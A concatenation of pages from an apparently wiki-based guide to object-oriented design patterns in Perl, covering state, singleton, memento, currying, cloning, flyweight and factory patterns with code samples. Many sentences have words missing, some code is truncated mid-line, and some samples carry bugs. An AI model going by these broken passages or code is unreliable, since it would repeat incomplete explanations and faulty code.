Taco::Topper::Cheese. This creates a sort of a cow-milking-itself problem. The taco shouldn't be cheesing itself, some other third party should make the connection. Assuming that the topping counter has been robotized and humans enslaved by the taco craving robots, perhaps the topping counter could cheese the taco. [13]. Taco::Topper's strange die() calls give a prime example of run time interface checking versus compile time interface checking. Perl does this run time, Java compile time. Since the Java compiler would catch either of those errors, no run time checks are needed - those die() calls could go away. Also, the program wouldn't need to be thoroughly tested to find out if those die() calls ever happen - once again, it would be cought at compile time. The "VisitorPattern" in VisitorPattern is a special case of "FeatureEnvy" in FeatureEnvy: we're more concerned about another objects data than our own. This flies in the face of the first rule of programming: data and related code should be packaged together. "FeatureEnvy" in FeatureEnvy suggests that perhaps the code should just be moved into the object being tweaked. In this case, we've been there, didn't like it, and moved it, but abstracted it behind an interface. The alternatives would have been or something far worse. The first rule of programming is that anything is okay if its hidden behind an interface. The important thing to remember is that we can cheese things as long as they provide an interface that allows cheesing. In this example, query_flag(), set_flags(), query_price(), and add_price(). Credits:, See Also Problem: Values from a definitive list of permissiable values are needed. In Perl, hashes of possible valid values are commonly used, and enums are used in C. These permissiable values must be packaged with their behavior [14], or we're trying to apply to this idea in an way. Or, each object is a special: unique, impossible to recreate without being given it, and therefore later usable as proof of having been given the cookie. Solution: Centralize creation, containment, and distribution of the objects. The container of the objects also plays the roles of both the creator and distributor. The creator aspect makes one of each when it itself is created, like the "SingletonPattern" in SingletonPattern applied to multiple objects. The distributor aspect descides to whom and on what basis the objects are distributed. The idea of "TypeSafety" in TypeSafety allows us to validate that these objects probably came from our pool without having to have an explicit list of all of the members of the pool: # using TypeSafety: sub set_day { die unless $_[0]->isa('Day'); $day = shift; return 1; } # using a plain old hash: sub set_day { die unless exists $daysref->$_[0]; $day = shift; return 1; } Everything from this set passes the "isa" test, so we can use "TypeSafety" in TypeSafety to check our arguments. In any other language, it would be impossible to add to the set after being created this way, but we could do revisit the package (see "RevisitingNamespaces" in RevisitingNamespaces) or redefine the constructor in Perl, so this shouldn't be considered secure. package Day; use ImplicitThis; ImplicitThis::imply(); $mon = new Day 'mon'; $tues = new Day 'tues'; my @days; sub new { die unless caller eq __PACKAGE__; my $me = { id=>$_[1] } bless $me, $_[0]; push @days, $me; return $me; } sub get_id { return $id }; sub get_days { return @days; } # in Apopintment.pm: package Appointment; my $day; sub set_day { die unless $_[0]->isa('Day'); $day = shift; return 1; } XXX examples of use, what you can and cannot do, etc. Java's API, AWT especially, has numerous examples of this. AWT.Color contains AWT.Color.RED, AWT.Color.BLUE, and so forth. This provides a symbolic name for objects, where each object is unique. There will never be two different BLUE objects floating around. This allows us to compare them for equality using their pointers: $mon eq $mon; # true $mon eq $tues; # false This behavior, too, is shared with the "SingletonPattern" in SingletonPattern. The same effect could be acheived using "OverloadOperators" in OverloadOperators. This approach is simplier and more clear. If we give someone AWT.Color.BLUE, and then they later give it back to us, we can use the eq test to decide with certainty whether or not we gave them BLUE as there is no other way they could possibly obtain it [15]. Credits: Unknown! Dates back a long time, though... XXX, See Also Problem: Checks litter the code. Nearly every method checks one specific instance variable to decide how to behave. The possible values of this variable are finite in number and well understood: on and off, or north, south, west, east, for example. Solution: Make each possible state of the object into a subclass. Leave the general case and the general logic in the parent object. Consider the state variable to be a constant in each subclass and optimize it away in your code. What happens when a light switch is thrown depends on its current state: on or off. Its new state is the opposite. A light switch has to be capable of dealing with all of the complexities of being either on or off, which isn't a lot of complexity, really. However, some machines have dozens or hundreds of states. This one machine has to know how to be in each state. In reality, few machines serve a large number of purposes. Attempts have been made to combine cell phones and PDAs, cell phones and MP3 players, PDAs and MP3 players, MP3 players and portable storage devices, PDAs and portable storage devices, audio recorders and MP3 players, audio recorders and PDAs, audio recorders and cell phones... in thousands of combinations... there is not currently an example of all three of those things in one device. It is complex to have a pocket full of devices, but it also complex to <s>license all of the patents needed to implement</s> design a device that serves every purpose. Design simplicity wins, for now. Likewise, when implementing a complex virtual object, sometimes it is best to represent it as a collection of simple objects, each of which knows exactly what its purpose is and cares nothing for the purposes of the other objects, not even able to agree on a common flash media format. When you wish to switch from one mode of the object to another, you simply replace it with the other object. No complex internal state change occurs, just one broad over all state change. States are each clearly defined and seperate. package Pocket::Computer; sub record_audio { # implemented in some subclasses but not others } sub take_a_memo { # that we can do } sub make_a_call { die "don't know how, and the FCC would have a cow"; } package Pocket::Phone; sub record_audio { # some do, some don't. most don't. } sub take_a_memo { die "i'm not a PDA"; } sub make_a_call { # this we can do } Some devices can do some things, others can do other things. Each device does not have to check to see if it is the kind of device that can - it just knows, because thats what it is, and identity is a large part of. At a certain level of complexity the concept of a is introduced. Cars suffer from this complexity. You may go from parked to idling, or you may go from idling to accelerating, but not from parked to accelerating. Going from accelerating to parked is also known as an insurance claim. Each state knows the states that are directly, immediately attainable. or is needed to plan out anything more complex. XXX - "TinyWiki" in TinyWiki parser as an example and "ImmutableObject" in ImmutableObject coupled with "AbstractFactory" in AbstractFactory describe an alternative arrangement: when a state change is needed, the existing object is passed as an argument to the factory along with the any information needed to decide what the next object will be. The "AbstractFactory" in AbstractFactory returns an "ImmutableObject" in ImmutableObject, initialized with the existing objects data, to replace the existing object. One object is swapped for another not through delegation and a facade, but through an "AbstractFactory" in AbstractFactory that spits out instances of "ImmutableObject" in ImmutableObject., page 258, has a very good example of creating a simple web BBS using CGI::Application ( Application) . CGI::Application ( Application) models a users web experience as a. Each screen is a state that takes you to other states. The state transitions are buttons and so forth on the screens., See Also External Pages Linking to This Page: Problem: Objects are left in an inconsistant state in a failure scenario. Solution: Checkpoint the object and restore it in the event of failure. Synopsis: You need an "Undo" behavior. Delegate an object to be the keeper of another. When: You are starting something you may not be able to finish. An operation might abort, leaving data in an inconsistent state. Symptoms: Querying values from an object and conditionally restoring them. XXX Generic example with a deep-copy algorithm. Easily implemented by wrapping one object inside of another and using Clone. package Memento; sub new { my $type = shift; my %opts = @_; die __PACKAGE__ . " requires an object passed on its constructor: new Memento object=>\$obj" unless $opts{'object'}; my $this = { object=>$opts{'object'}, checkPoint=>undef }; bless $this, $type; } sub mementoCheckPoint { my $this = shift; $this->{'checkPoint'} = $this->deepCopy($this->{'object'}); } sub mement Mement. Credits: See Also, Problem: You're using a constructor to create an object, but the design considers it an error to create more than one instance of that class. Or, you have a single instance of an object now, but this is an implementation detail, subject to change. "PassingState" in PassingState says to create the resources as early as needed and pass it to constructors, but you would be passing it almost everywhere. Solution: Have your constructor, new(), return the same single object every time it is called. Allow objects to call the constructor directly. The Singleton will create the single instance of itself, and will be the repository for that single instance. Synopsis: You've found a very good reason to have exactly one of a certain class. You rig the constructor to return the single existing instance instead of making a new one. When:) lists example valid uses as logging, network interaction, and database connections. Symptoms: Resource objects are created when the program starts and passed to the constructor of each object initially spawned. Each of those objects in turn pass this resource object to each of their children. Given a object, you want to be sure that its the true, one and only,, and not someone's cheap knock-off. { ... } Singletons are a special case of. Don't Use Singletons When... This is over used. Don't make too many assumptions about when two of something could be handy. For example, the X-Windows windowing system early on assumed that more than one display could be attached to a system. This pattern should be used to distribute globally available resources. It should not be used to contain context or state information - this would make it impossible to create distinct instances of objects which use the singleton. Singletons should not be. Since many programs have a proliferation of Singletons, it may be handy to place all of them in a global Static Object, which itself is a Singleton. Singletons managing a set of 1 or more objects for which there is contention or sharing is a. When a is wanted to hold configuration information, instead use "PassingPattern" in PassingPattern: this allows different instances of objects to be given different runtime parameters. Failure to do so would violate the identity requirement of programming, and we wouldn't want that, would we? - brian d foy's article on Singleton in The Perl Review for a good description of the delimma - very good., Credits: Resources: See Also This is based on "TypeSafety" in TypeSafety, which is itself based on, or the concept of types it puts forward, rather. We confound the subject with "AnonymousSubroutineObjects" in AnonymousSubroutineObjects. We use "TypeSafety" in TypeSafety, "ClassAsTypeCode" in ClassAsTypeCode and "NewObjectFromExisting" in NewObjectFromExisting. "RunAndReturnSuccessor" in RunAndReturnSuccessor is a fundamental idea to the idea of currying, and we demonstrate it in the second example. Currying is a universe of single argument functions. This sounds absurd and useless, and would be except for the tenets of. This pattern develops when state is accumulated incrementatally: see "AccumulateAndFire" in AccumulateAndFire. "AccumulateAndFire" in AccumulateAndFire comes about when there are "TooManyArguments" in TooManyArguments to pass all at once. Attempting to pass them all at once loose us the flexibility of being able to set things up, run, change a few things, run, and so on. For example, lets say we're playing roulette. We can pick a color and perhaps a few numbers. package Roulette::Table; sub new { my $class = shift; my $this; # if new() is called on an existing object, we're providing additional # constructors, not creating a new object if(ref $class) { $this = $class; } else { $this = { }; bless $this, $class; } # read any number of and supported type of arguments foreach my $arg (@_) { if($arg->isa('Roulette::Color')) { $this->{'color'} = $arg; } elsif($arg->isa('Roulette::Number')) { push @{$this->{numbers}}, $arg; } elsif($arg->isa('Money')) { if($this->{money}) { $this->{money}->combine($arg); } else { $this->{money} = $arg; } } } return $this; } sub set_color { new(@_); } sub add_number { new(@_); } sub add_wager { new(@_); } The constructor, new(), accepts any number or sort of object of the kinds that it knows about, and skuttles them off to the correct slot in the object. Our set routines are merely aliases for new(). new() may be called multiple times, directly or indirectly, to spread our wager over more numbers, change which color we're betting on, or plunk down more cash. I don't play roulette - I've probably butched the example. Feel free to correct it. Use the little edit link. People won't be doing everything for you your entire life, atleast I hope. We still have the problem of having an object exist in an indeterminate state. If we apply "AnonymousSubroutineObjects" in AnonymousSubroutineObjects, we get something much closer to the original idea of currying. Rather than storing state in an object as it is built up, store it in a that is object aware: package Roulette::Table; use MessageMethod; sub new { my $class = shift; my $this; my $curry; bless $this, $class; $curry = MessageMethod sub { my $msg = shift; if($msg eq 'spin_wheel') { die "Inconsistent state: not all arguments have been specified"; } if($msg eq 'set_color') { $this->{'color'} = shift; } if($msg eq 'add_number') { $this->{'numbers'} ||= []; my $numbers = $this->{'numbers'}; push @$numbers, $arg; } if($msg eq 'add_add_money') { if($this->{'money'}) { $this->{'money'}->combine($arg); } else { $this->{'money'} = $arg; } } if($msg eq 'is_ready') { return 0; } if($this->{'money'} and $this->{'color'} and $this->{'numbers'}) { return $this; } else { return $curry; } }; return $curry; } sub spin_wheel { # logic here... } sub is_ready { return 1; } This second example doesn't support repeated invocations of new() to further define an unfinished object. It could, but it would detract from the example. Add it for backwards compatability if for any reason. More radically, we don't accept any constructors. We return an entirely new object that has the sole purpose of accepting data before letting us at the actual object. Representing two different states of an object with two different objects is the subject of an ongoing debate as well as "StateVsClass" in StateVsClass. Rather than using "TypeSafety" in TypeSafety to check the class membership of objects passed in, we could just as easily accept "NamedArguments" in NamedArguments. The choose is a matter of what feels right, and what is adequate without being overkill. In brief, returning a custom object, partially configured by some argument, ready to either do work or accept more configuration, is the act of currying. More correctly, constructing a function to accept single arguments and return another function, or converting an existing function to such, is currying. sub create_roulette_table { my $color; my $money; my $numbers; return sub { $color = shift; return sub { $money = shift; return sub { push @$numbers, shift; return sub { # play logic here }; }; }; }; } # to use, we might do something like: my $table = create_roulette_table()->('red')->('500')->(8); $table->(); # play $table->(); # play again # or we might do something like: my $table_no_money = create_roulette_table()->('red')->('500'); my $table; $table = $table_no_money->(100); $table->(); # play $table->(); # play again -- oops, lost everything $table = $table_no_money->(50); $table->(); # play some more This is stereotypical of currying as you'd see it in a language like Lisp. The arguments are essentially untyped, so we take them one at a time, in a specific order. Also like Lisp, the code quickly migrates across the screen then ends aburptly with a large number of block closes (the curley brace in Perl, paranthesis in Lisp). The Lisp version makes heavy use of "RunAndReturnSuccessor" in RunAndReturnSuccessor. If we wanted to adapt this logic to spew out, where each method generated wasn't tied to other generated methods, we would need to explicitly copy the accumulated lexical variables rather than simply binding to them. For example, my $color = $color; my $money = shift; would prevent each anonymous routine returned from sharing the same $color variable, although without further logic, they would all have the same value. This amounts to the distinction between instance and class data. Understanding the Lisp-ish example isn't critical to using this idea. It merely serves to give us some context to the idea, and a counter-example to the approach. It also clearly demonstrates the advantages of having partially constructed objects laying around: we don't need to construct a whole new table just to put some more money down, but we have the power of creating objects to represent state at the same time. "PerlMonks" in PerlMonks:62737 - taking reference to methods (closure) - closely related to "CurryingConcept" in CurryingConcept - - import this,,, See Also External Pages Linking to This Page: Problem: A copy of an object is needed so it can be diddled while preserving the original, or an existing object should serve as a template for a new object. Solution: Instead of probing into its innards from outside, implement it, or re-implement it, to have a clone() method. clone() makes an exact duplicate of it from the inside. When: You want to keep an unmodified copy of an object around, or you want to play with a copy of an object without hurting the original. Symptoms: You're querying all of the fields out of one object, and passing them to the accessor methods of another object of the same type. Or, you access the underlining data structure directly, looping over the fields in one object, assigning the values to another. You spend a lot of effort to set up objects with are similar to each other. Cloning must be designed into an object, or added in subclass. Usually. Subclasses of a class with a clone() interface that add features to the class need to override the ancestors clone() method and augment it to handle the new features. Since only a designer of a class will know for sure how to correctly clone it, it must be implemented with each package that features it. Cloning lets you distribute or play with copies of objects. It also lets you more easily make a series of similar objects, using one object as a template for others. For objects based on hashes, an extremely simple implementation of this might look like: package Mumble; sub new { ... }; # standard constructor sub clone { my $self = shift; my $copy = { %$self }; bless $copy, ref $self; }; Note that this is a, not a: clone() will return an object that holds additional references to things that the object being copied holds onto. If it were a, the new copy would have it's own private copies of things. This is only an issue when the object being copied refers to other objects, perhaps delegating to them. A is a recursive copy. It requires that each and every object in this network implement -clone()>, though we could always fall back on reference sharing and fake it. my $copy = { %$self }; %$self expands the hash reference, $self, into a hash. This is done in a list context, so all of the key-value pairs are expanded returned out - this is done by value, creating a new list. This happens in side of the { } construct, which creates a new anonymous hash. This is assigned to $copy. $copy will then be a reference to all of the same data as $this, The end result is a duplicate of everything in side of $self. This is the same thing as: sub clone { my $self = shift; my $copy; foreach my $key (keys %$self) { $copy->{$key} = $self->{$key}; } bless $copy, ref $self; } If we wanted to do a, we could modify this slightly: sub clone { my $self = shift; my $copy; foreach my $key (keys %$self) { if(ref $self->{$key}) { $copy->{$key} = $self->{$key}->clone(); } else { $copy->{$key} = $self->{$key}; } } bless $copy, ref $self; } This assumes that $self contains no hashrefs, arrayrefs, and so on - only scalar values and other objects. This is hardly a reasonable assumption, but this example illustrates the need for and implementation of recursion when cloning nested object structures. "MomentoPattern" in MomentoPattern has an example of copying an objects data against its permission - something that shouldn't be made a habit. Clone Factories keep a pool of archetypical objects, and return slightly modified copies on request. XXX - example. Permutations exist where other objects serve as general purpose object cloners or copiers. Due to Perl's introspective nature, a great deal of detail can be replicated. However, this will not always be safe, as some packages have special arrangements with their contents, some objects cannot handle multiple references existing to them, and so forth. This violates the encapsulation principle. Class::Classless ( Classless) is an interesting twist on the idea of using one class as a template - not only is object instance data replicated, but objects themselves are configured to have the logic and methods you want, and then are cloned for their behavior. works this way. Objects could be looked at as buckets of data and methods, whether either type of thing can be thrown into the bucket. Copying (by reference) the methods from one object into a fresh one is the work of a constructor, and is how new objects of that "class" are made. Copying the methods and the data would be a clone, according to our description of object cloning. XXX more on Class::Classless ( Classless). Categories See Also See also Clone on CPAN,, Problem: A class of very light weight objects are being used in large numbers. Reusing objects by sharing references would save a lot of memory. Solution: Instead of creating thousands of identical copies of objects, keep a cache, and hand out references to existing copies. When: You're passing a lot of simple objects around. You're using objects as a sort of enumeration. You've just gone OO overboard and made everything an object. Symptoms: Object Oriented programming is at odds with memory usage. A Flyweight is a permutation of an "AbstractFactory" in AbstractFactory. A million tiny objects can weigh a ton. By keeping only one copy of each, memory usage can be dramatically reduced.. As an alternative, Perl lets you bless scalars, which weigh about the same as an object reference. Blessed scalars aren't subject to the requirement that they be shared copies. Blessing a scalar into a package gives you an OO interface to a single value. If needed, you can later upgrade the implementation to a full blown hash, and keep the same interface.. See Also: "ImmutableObject" in ImmutableObject, "AbstractFactory" in AbstractFactory, See Also:, External Pages Linking to This Page: Synopsis: Small objects that can or should be shared, but change state. When: You have a lot of little objects that sometimes keep one value, but sometimes change value. When someone changes the value of one, you don't want that change to show up in all of the other objects that have a pointer to that object, but you don't want to have to make a clone of that object for each object that has it, either. Symptoms: Frequently copying objects and passing them out. Lots and lots of tiny objects can eat up memory. If you've gone so far as to represent even little things as objects, you may find that your memory isn't going as far as it used to when everything was just a scalar. You would pass out the same object to everyone, but you really want everyone to have a private copy of it. With a small change in how your module is used, you can declare that a given instance of it never changes values. If your object computes a new value, it returns a new instance of itself with that new value. Instead of writing: ; } Returning new objects rather than changing ones that someone else might have a reference to avoids the problems of "ActionAtADistance" in ActionAtADistance with pointers - so long as you're using variables which the correct scope to store the pointers. [17] Returning new objects containing the new state is strictly required for overloading Perl operators. Java's String class (different than) are an example of this: you can never make changes to a String, but you can ask an existing String to compute a new String for you. "StatePattern" in StatePattern talks about a mechanism for implementating state that consists of one "ImmutableObject" in ImmutableObject taking another in itis constructor, and digesting it to initialize itself. Coupled with an "AbstractFactory" in AbstractFactory to arbitrare which subtype will be used for the next object, this is a powerful construct. Used as the output of a Flyweight from "FlyweightPattern" in FlyweightPattern. Important concept to "OverloadOperators" in OverloadOperators., See Also Problem: Code that decides which of several subclasses to instantiate is being cut and paste around the program. Solution: Centralize that logic in an object. Return a subtype of some abstract type. When: Any time polymorphism is needed: the option of subclassing should be kept open. See "AbstractRootClasses" in AbstractRootClasses. Based on circumstance, an object may be created from one of a number of subclasses. The decision of which type of object to create doesn't seem to belongs where the object is created, but rather somewhere neutral. Symptoms: Split a class into two, or introduce a new or different implementation of a class under a different name. Suddenly you find yourself going through all of the code looking for references to the old package. You know that if you make a similar change in the future, you'll have to go through all of the code again. An Abstract Factory makes the decision of which class or subclass to create when. This decision making logic is tucked away in one place, rather than being spread around - think of it as. Centralizing the logic gives us: The return value for the method is the base class type or abstract class type (essentially the same in Perl). Example "pure", each kind of car should do push @ISA, 'Car', so that they pass the $ob-isa('Car')> test required by "TypeSafety" in TypeSafety. This lets programs know that it is a car (reguardless of kind) and can thus be used interchangably. See,, "TypeSafety" in TypeSafety. Refactoring "RefactoringPattern" in RefactoringPattern may lead you to turn an object from a regular object into an "AbstractFactory" in AbstractFactory. Break code down into subclasses of ourself, and create those objects. This page is now. Before breaking up the code, create the subclasses. Class AutoVivification Before creating the subclasses, play with letting Perl do it for you. "ClassAsTypeCode" in ClassAsTypeCode says that a classes primary type can be used to distinguish it as a special case of a generic type, even if no implementation changes. This will give us a chance t prototype working with subclasses and make sure we aren't falling prey to "EmptySubclassFailure" in EmptySubclassFailure. package Car::Factory; sub create_car { # this way we can do Car::Factory->create_car(...) or $carfactoryref->create_car(...) # see NewObjectFromExisting. $kind could be computed rather than taken verbatum from input. In most cases, you will want to compute it, as in our first example. Once computed, the package can be set up automatically. And Resist temptation to re bless or convert things except into subclasses: see "NoSexUntilMarriage" in NoSexUntilMarriage. "StatePattern" in StatePattern is similar: different objects fields requests. The state object, like the "AbstractFactory" in AbstractFactory, has the criteria built in to decide which object to use. Rather than returning the selected object like the "AbstractFactory" in AbstractFactory, it merely delegates requests to that object, holding onto references to a single instance of each type of object. A good example of an abstract factory would be building a system that worked with mod_perl 1 and mod_perl 2. Eventually, I'll get round to giving you an example of this - Yes, a useful example would be nice indeed! - "ScottWalters" in ScottWalters This doesn't make it clear where the Car::Ford ( Ford) (etc) modules should get loaded, though. Wouldn't be better to say: if ($topsped < 100 and $passengers >= 4) { require Car::Ford; return new Card::Ford ; } -, See Also External Pages Linking to This Page: A real example? Code from real examples is far too long to keep readers attention. I'll describe a real application, and if you want the code, you can email me. A client has a cart. Items in the cart are represented as objects. Initially, everything was an 'Item'. Donations were introduced - the client is a not-for-profit corporation. Tax and shipping is computed differently on donations added to the cart. Re-using the cart for wholesale orders is on the horizon. Once again, tax and shipping are computed differently: no tax, and shipping is actual-cost. Rather than burdon 'Item' with the special logic of examining its part number and deciding which of three personalities each method should have, one object is given the duty of creating an object of the right type from a selection of three. Each of the three different subclasses of 'Item' implement the relavent methods completely differently, while inheriting some common implementation. Still want to see the code? - "ScottWalters" in ScottWalters Problem: The exact implemenation of an object varies. Solution: Create a factory that centralizes the decision making logic surrounding which implementation to use. Channel all requests for objects of for that role through the factory. A "FactoryObject" in FactoryObject has a. The basic factory always creates objects of the same concrete type. Factories, as objects, are pluggable: Which factory is used, and therefore which concrete type is created by it, can be changed. my $factory = new FordFactory; my $wifes_car = $factory->create_car(); $wifes_car->isa('Car') or die; # later: $factory = new ChevyFactory; my $husbands_car = $factory->create_car(); $husbands_car->isa('Car') or die; Code need not be concerned with where the cars come from, only that a Car materialize upon demand. Having a second source available for things is important. If there were only one auto manufacturer, a lot fewer people would be happy with their ride. Ralph Nader never would have won a law suit against them. The same goes for programs. Hacking up an entire program to change which implementation you use is undesireable. Sometimes you have an implementation you really want to get rid of. Usually the decision is made at some point in configuration which factory is to be used, though it may be used to implement the "StatePattern" in StatePattern. A Factory will always create objects of the same concrete type. Contrast this with the "AbstractFactory" in AbstractFactory: Per "AbstractRootClasses" in AbstractRootClasses, all objects of a new type should be an and a concrete implementation of it. This lets you talk about objects in terms of type where "TypeSafety" in TypeSafety is concerned and not have to change those type delcarations when a new implementation is introduced. An "AbstractFactory" in AbstractFactory will create objects of a fixed and a conrete type of it's chosing. A plain old factory is useful when we're able to deturmine at some point what type all future manufactured objects should have for a concrete type. An "AbstractFactory" in AbstractFactory is suitable when this decision can never be finalized: the current state of the running program always sways the decision. Supports Polymorphism and "LooseCoupling" in LooseCoupling., See Also Synopsis: Flow control is spread all over the place. Understanding and modifying flow requires knowledge of many modules, which is error prone. Instead, you centralize transitions in flow, and represent state transitions as objects. Each state object knows how to create an object representing any state immediately accessible from itself. When: Applications, or modules that perform many functions at different times. Symptoms: Programs that people are scared of editing for fear of inserting terminal bugs. Programs that stop unexpectedly. "The Halting Problem" is a subject of much research. No technique exists for predicting when an arbitrary program will suddenly stop running and bail out. Programmers of critical systems are deeply concerned with whether or not their programs contain unexpected conditions that would cause sudden, catastrophic termination. Modeling the program flow isn't a complete answer, but it addresses two important problems: Each state would have a method that, given user input or the result of a computation, would return another state object, to be executed. Queues and Stacks can extend the possibilities: the basic idea is only to model the transitions. # Non ObjectOriented: my $parser = do { my $html; # HTML to parse my $tag; # name of the current HTML tag my $name; # name of current name=value pair we're working on my $namevalues; # hashref of name-value pairs inside of the current tag my $starttag = sub { if($html =~ m{\G()}sgc) { return $starttag; } if($html =~ m{\G<([a-z0-9]+)}isgc) { $tag = $1; $namevalues = {}; return $middletag; } if($html =~ m{\G[^<]+}sgc}) { return $starttag; } return undef; }; my $middletag = sub { if($html =~ m{\G\s+}sgc) { return $middletag; } if($html =~ m{\G<(/[a-z0-9]*)>}isgc) { $name = $1; return $middlevalue; } if($html =~ m{\G>}sgc) { $namevalues->{$name} = 1 if $name; return $starttag; } return undef; }; my $middlevalue = sub { if($html =~ m{\G=\s*(['"])(.*?)\1}isgc) { $namevalues->{$name} = $1 if $name; return $middletag; } if($html =~ m{\G\s+}sgc) { return $middlevalue; } return $middletag; }; return sub { $html = shift; return $starttag; }; }; open my $f, 'page.html' or die $!; read my $f, my $page, -s $f; close $f; $parser = $parser->($page); $parser = $parser->() while($parser); Of course, rather than iterating through $parser and using it as a generator, we could blow the stack and make it do the recursive calls itself. In general, return $foo; would be replaced with return $foo-();>. XXX I wonder if parser could do $_[0] = next object so that merely saying $parser->(foo) would work in place of $parser = $parser->(foo).. that would be nifty! The observant reader will notice that each anonymous subroutine we define represents a state in our grammar. At any given moment, there are only a few things which are valid, so there is no point in looking for everything. Doing so would lead to confusion and bugs. We could rewrite this to be cleaner and use fewer variables, but I choose this presentation because of its extremely regular structure. XXX example. See Also: "StatePattern" in StatePattern, "ImmutableObject" in ImmutableObject,, "MomentoPattern" in MomentoPattern, See Also:) - implement the state transitions in your program as objects Related concepts:, "IteratorInterface" in IteratorInterface,, Credits: /,, new() might thought to be the creator of objects, but we know bless() is how objects are really made. Objects creation is really little more than: my $ob = bless { color => 'yellow', size => 'large' }, 'GetAndSet'; Of course, we need to back this up with some implementation: package GetAndSet; sub AUTOLOAD { my $this = shift; (my $method) = $AUTOLOAD =~ m/::(.*)$/; return if $method eq 'DESTROY'; (my $request, my $attribute) = $method =~ m/^([a-z]+)_(.*)/; if($request eq 'set') { $this->{$attribute} = shift; return 1; } if(request eq 'get') { return $this->{$attribute}; } die "unknown operation '$method'"; } Of course, this is considered. You should always use. Okey, usually. See Also /* * If you are going to copy this file, in the purpose of changing * it a little to your own need, beware: * * First try one of the following: * * 1. Do clone_object(), and then configure it. This object is specially * prepared for configuration. * * 2. If you still is not pleased with that, create a new empty * object, and make an inheritance of this objet on the first line. * This will automatically copy all variables and functions from the * original object. Then, add the functions you want to change. The * original function can still be accessed with '::' prepended on the name. * * The maintainer of this LPmud might become sad with you if you fail * to do any of the above. Ask other wizards if you are doubtful. * * The reason of this, is that the above saves a lot of memory. */ - Comment as seen on core library objects in LPMud 2.4.5 Mirroring Real-Life If you're thinking of using inheritance - @ISA in Perl - then you should be reading - there is a correct way to do it, then there is what everyone else does. If you aren't thinking of using inheritance, then I wonder why you're reading this, and you probably are too. LPMud is a dynamic adventure system. Players play while wizards code. New puzzles spring into being from within the game, while its running. The game is, of course,, in the name of mirrioring real-life object relationships. LPMud comes from the days when 24 megs was a lot of memory on a Unix server [18] Given this object oriented system and these 24 megs of RAM, wizards cleverly started copying core library objects around - the player object, the monster object, the weapon object - and making changes to them for their own use - a clear case of "CutAndPasteProgramming" in CutAndPasteProgramming. As you can see, that didn't go over very well. Modern motivations against "CutAndPasteProgramming" in CutAndPasteProgramming are different than lack of RAM. See "CutAndPasteProgramming" in CutAndPasteProgramming, and then when you're sold, "AbstractClass" in AbstractClass. Perl's equivilent to LPMud's clone_object(ob) is ob-new()>, though a may return a cloned or configured object. See "CloningPattern" in CloningPattern. Creating object structures by holding onto references to other objects that you created with new() is known as delegation. See. This is the basis of most object patterns in this book. Perl's equivilent to inherit is use base. See. Creating object structures using inheritance is called. are best avoided. Inheritance should be used to build specialized versions of generic objects - not to generalize further, and not to combine general objects to make something. Inheritance shouldn't be confused with exporting. Exporting adds features to a package, very much like, but these features are used by that object only. Exporting isn't used by sane people to build new types of objects. If you want Carp, for instance, you'll use Carp yourself, and not attempt to call croak in another object that happens to use Carp. See "ExportingPattern" in ExportingPattern. See Also Contrast Category, Problem: The base class is simple and subclasses are frequently implementing the same features on top of the base class, but in different combinations. Solution: Allow objects to handle methods differently depending on their state, rather than demand that every possibily behavior be exhibited by a seperate object. Move shared behavior upwards even if not every subclass ultimately uses it. Make the base class the general, and allow subclasses to remove features - permenently or conditionally - to create special purpose version. Given a special case of something that isn't really one at all, refactor. Gimpy versions of objects are still merely versions of those objects. Lack of feature doesn't automatically make something a candidate for superclasshood. In general, there is no harm adding functionality to the base class: this is often the cleanist solution, and the quickist way to make it available to all of the subclasses. "DecoratorPattern" in DecoratorPattern talks about a degenerate situation where attempt to create endless combinations of features and ultimately fail. Simple Rules: A parrot that is as dead as a door nail is still just a special case of parrots, and parrots in general have facilities to perch(), squak(), eat() and bite(). Whether or not these facilities are working, or what the exact behavior of them can be left to the subclass. Perhaps the parrot is pining for the fjords and doesn't feel like squak()ing. Perhaps its deceased, but a parrot nonetheless. Inheritance is "specialized case of", not "made out of". A bird is not a specialized case of a beak and legs. For composing something out of mix and match parts, use composition: see "CompositePattern" in CompositePattern.; } A call to squak() in a parrot is a notification that it should squak, or a request that it sqauk, never a garantee that a squak will be emitted. "AbstractClass" in AbstractClass and "FunctionalityIsToBeShared" in FunctionalityIsToBeShared [19] tell us to move functionality as high up the inheritance chain as is useful. "StatePattern" in StatePattern suggests delegating requests to a different object depending upon state, where each object you delegate to represents a state. This satisifies our requirement that objects not be swapped out runtime, and that polymorphism should be maintained [20], even when the bird goes into a "dead" state. We still maintain the same presentation - unlike "RunAndReturnSuccessor" in RunAndReturnSuccessor, a completely different object isn't swapped in in our place. Only behind the scenes, through a cleverly placed layer of delegating, is statehood implemented in terms of objects. This satisifies the "LawOfDemeter" in LawOfDemeter. See Also,,, Synopsis: Use a Value Object to communicate the details of the action that is desired. When: There is a proliferation of similar methods, and the interface to implement that kind of object is becoming unwieldy. Symptoms: Too many public methods for other objects to call. An interface that is unworkable and always changing. You feel that a method name must include prose describing the exact action, and this is preventing layering your code. A "CommandObject" in CommandObject is a case of using a to communicate which action is to be performed, along with any argument data. This is sent to a single method in the class that handles commands of the given type. That object is free to implement command processing with a switch, a variable method dispatch, or a call to a variable subclass. This lets you make changes to which commands are defined only in the definition of the command objects itself and the classes that actually use that command, rather than every class that wants to implement the command processing interface. It also frees up the command implementing the command processing interface to use any number of ideas for dispatching the command, once it has it: # example of a switch style arrangement: sub doCommand { my $me = shift; my $cmd = shift; $cmd->isa('BleahCommand') or die; my $instr = $cmd->getInstructionCode(); if($instr eq 'PUT') { # PUT logic here } elsif($instr eq 'GET') { # GET logic here } # etc } # example of a variable method call arrangement: sub doCommand { my $me = shift; my $cmd = shift; $cmd->isa('BleahCommand') or die; my $instr = $cmd->getInstructionCode(); my $func = "process_" . $instr; return undef unless defined &$func; return $func->($cmd, @_); } # example of a variable subclass arrangement. # this assumes that %commandHandlers is set up with a list of object references. sub doCommand { my $me = shift; my $cmd = shift; $cmd->isa('BleahCommand') or die; my $insr = $cmd->getInstructionCode(); my $objectRef = $commandHandlers{$instr}; return $objectRef ? $objectRef->handleCommand($cmd, @_) : undef; } Since Perl offers AUTOLOAD, this idea could be emulated. If a package wanted to process an arbitrary and growing collection of commands to the best of its ability, it could catch all undefined method calls using AUTOLOAD, and then attempt to dispatch them (this assumes %commandHandlers is set up with a list of object references keyed by method name): sub AUTOLOAD { my $me = shift; (my $methodName) = $AUTOLOAD m/.*::(\w+)$/; return if $methodName eq 'DESTROY'; my $objectRef = $commandHandlers{$methodName}; return $objectRef ? $objectRef->handleCommand($methodName, @_) : undef; } This converts calls to different methods in the current object to calls to a handleCommand() method is different objects. This is an example of using Perl to shoehorn a Command Object pattern onto a non Command Object 